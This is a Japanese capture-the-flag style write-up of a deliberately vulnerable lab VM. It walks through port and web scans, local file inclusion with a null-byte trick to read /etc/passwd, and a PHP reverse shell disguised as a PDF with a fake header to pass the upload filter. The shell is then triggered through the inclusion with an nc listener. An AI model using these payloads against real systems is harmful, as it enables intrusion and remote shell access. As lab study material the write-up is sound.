vulnhub Pentester Lab: PHP Include And Post Exploitation 雑記
Pentester Lab: PHP Include And Post Exploitation
イメージはライブ起動で読み込むので、ストレージは適当に小さいやつで良い。
サービス調査
# nmap -p- 10.10.10.15 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 11:27 EDT Nmap scan report for 10.10.10.15 Host is up (0.00055s latency). Not shown: 65534 filtered ports PORT STATE SERVICE 80/tcp open http MAC Address: 08:00:27:DD:06:9A (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 164.23 seconds # nmap -p80 -sV 10.10.10.15 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 11:30 EDT Nmap scan report for 10.10.10.15 Host is up (0.00057s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.16 ((Debian)) MAC Address: 08:00:27:DD:06:9A (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.78 seconds
今回は素直に[port 80]だけ考えれば良い。
詳細
[port 80] http Apache httpd 2.2.16 (Debian)
# nikto -h 10.10.10.15 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.15 + Target Hostname: 10.10.10.15 + Target Port: 80 + Start Time: 2020-05-16 11:27:43 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.16 (Debian) + Retrieved x-powered-by header: PHP/5.3.2 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1". + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /index.php: PHP include error may indicate local or remote file inclusion is possible. + OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080. + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3268: /css/: Directory indexing found. + OSVDB-3092: /css/: This might be interesting... + OSVDB-3092: /login/: This might be interesting... + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3268: /images/: Directory indexing found. + Server may leak inodes via ETags, header found with file /icons/README, inode: 3440, size: 5108, mtime: Tue Aug 28 06:48:10 2007 + OSVDB-3233: /icons/README: Apache default file found. + /login.php: Admin login page/section found. + 8673 requests: 0 error(s) and 23 item(s) reported on remote host + End Time: 2020-05-16 11:28:12 (GMT-4) (29 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.15 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat May 16 11:28:34 2020 URL_BASE: http://10.10.10.15/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.15/ ---- + http://10.10.10.15/cgi-bin/ (CODE:403|SIZE:287) ==> DIRECTORY: http://10.10.10.15/classes/ ==> DIRECTORY: http://10.10.10.15/css/ + http://10.10.10.15/footer (CODE:200|SIZE:182) + http://10.10.10.15/header (CODE:200|SIZE:755) ==> DIRECTORY: http://10.10.10.15/images/ + http://10.10.10.15/index (CODE:200|SIZE:2020) + http://10.10.10.15/index.php (CODE:200|SIZE:2020) + http://10.10.10.15/login (CODE:200|SIZE:463) + http://10.10.10.15/main (CODE:200|SIZE:938) + http://10.10.10.15/server-status (CODE:403|SIZE:292) + http://10.10.10.15/show (CODE:200|SIZE:816) + http://10.10.10.15/submit (CODE:200|SIZE:832) ==> DIRECTORY: http://10.10.10.15/uploads/ ---- Entering directory: http://10.10.10.15/classes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.15/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.15/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.15/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Sat May 16 11:28:36 2020 DOWNLOADED: 4612 - FOUND: 10
php_include_and_post_exploitationって題しているので、そんな感じする部分から見ていきたい。
そんで見ていくとindex.phpからのリンクや表示されているものが、全てindex.phpのpageに入れた文字列に「.php」を付けたファイルを読み込んでいることが分かった。
何か、色々資格情報狙えそうだな。
NULLバイトトリックというのを聞いたので使ってみる。
http://10.10.10.15/index.php?page=../../../etc/passwd%00
資格情報は捉えた。
リモートファイルを読み込めるパターンもあるらしいが
http://10.10.10.15/index.php?page=http://10.10.10.3/reverse.php%00
今回はリモートファイルのインクルードは対策済みの模様。
ではローカルファイルしかない。
submitページからファイルが「/uploads/」にアップロードできそう。
いつものpentestmonkeyのリバシェphpとかアップロード試してみるとpdfしかだめだと言われる。
色々試すと、pdf以外のファイルで*.pdfの場合はダメ、pdfでpdf以外の拡張子だとダメだった。
サーバ側で拡張子のチェックと、ファイルタイプのチェックが行われてそう
ということで、こんな感じでいく。
# cp /usr/share/webshells/php/php-reverse-shell.php reverse.pdf # sed -i "1i%PDF-1.5\n" reverse.pdf # cat reverse.pdf | head %PDF-1.5 <?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. The author accepts no liability // for damage caused by this tool. If these terms are not acceptable to you, then // do not use this tool.
そんなんで良いのって思うかもしれないけれど、最初しかみてないぽい
あとは、ncとかでlistenしながら、pageでphpファイルとして読み込んでしまうindex.phpのお力を借りればOK
http://10.10.10.15/index.php?page=./uploads/reverse.pdf%00
# nc -nlvp 8080 Ncat: Version 7.80 ( https://nmap.org/ncat ) (snip) Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux 16:39:46 up 5:00, 6 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT user tty2 11:39 5:00m 0.00s 0.00s -bash user tty3 11:39 5:00m 0.01s 0.01s -bash user tty4 11:39 5:00m 0.00s 0.00s -bash user tty5 11:39 5:00m 0.00s 0.00s -bash user tty6 11:39 5:00m 0.00s 0.00s -bash user tty1 11:39 5:00m 0.01s 0.00s -bash uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: can't access tty; job control turned off
shell getchu!
after shell getchu
これrootシェルへの道は用意されてないぽい。
まあ、php_include_and_post_exploitationを学ぶものだったというわけですね。
終わり
PHP 5.3.4以降では、ローカルファイルをインクルードするときにNULLバイトトリックを使用して拡張機能を取り除くことができません。
らしいです。
参考